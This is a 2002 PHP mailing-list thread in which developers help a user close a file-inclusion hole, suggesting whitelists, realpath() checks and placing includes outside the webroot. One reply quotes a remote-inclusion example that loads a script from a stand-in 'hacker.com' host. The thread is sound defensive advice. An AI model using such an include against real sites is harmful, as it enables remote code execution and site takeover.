That still wouldn't fix anything if you're including a file based on
unchecked user input.
Make an array in your file of "safe" files to include, that can be
designated by the user.
$safe_files = array("file1","file2","file3");
include("/path/to/include/" . $safe_files[$_GET['include']] . ".php");
or...
switch($_GET['include'])
{
case 1: include("file1.php"); break;
case 2: include("file2.php"); break;
}
You should really, really, rethink your design where you have to include
files based on something passed in the url.
---John Holmes...
> -----Original Message-----
> From: John Wards [mailto:[EMAIL PROTECTED]]
> Sent: Friday, October 04, 2002 6:14 AM
> To: Stas Maximov
> Cc: PHP General
> Subject: Re: [PHP] Umm... Uh-oh
>
> ah never thought of that!
>
> John
>
> On Friday 04 Oct 2002 11:14 am, Stas Maximov wrote:
> > The easiest and safest way to get around this problem is to place
all
> your
> > include files outside of your webroot directory (say one level up),
so
> they
> > will be accessible locally via includes, but NOT accessible via
http.
> >
> > HTH, Stas
> >
> > ----- Original Message -----
> > From: "John Wards" <[EMAIL PROTECTED]>
> > To: "PHP" <[EMAIL PROTECTED]>
> > Sent: Friday, October 04, 2002 10:58 AM
> > Subject: Re: [PHP] Umm... Uh-oh
> >
> >
> > erm......would that alow hackers access? Say I have a database
include
> file
> > would hackers be able to get access to my database like this?
> >
> > (include('http://mysite.com/datainc.php');)
> >
> > I hope bloody not!!! if so how on earth do i get round that!
> >
> > John
> >
> > On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote:
> > > Use realpath() to check the path. I also suspect your script is
> > > vulnarable to cross-site includes
> > > (include('http://hacker.com/script.inc');)
> > >
> > > Rick Beckman wrote:
> > > >Okay, I was mistaken... There is a gaping security hole in my
simple
> > > > li'l script... How do I modify it to only accept files from a
> certain
> > > > path? I want the url format to be script.php?call=1 where "1" is
the
> > > > called file in the /includes/ directory. Just when I get
optimistic
> I
> > > > leave the entire system exposed. Yeah, that fits with my luck.
:-)
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
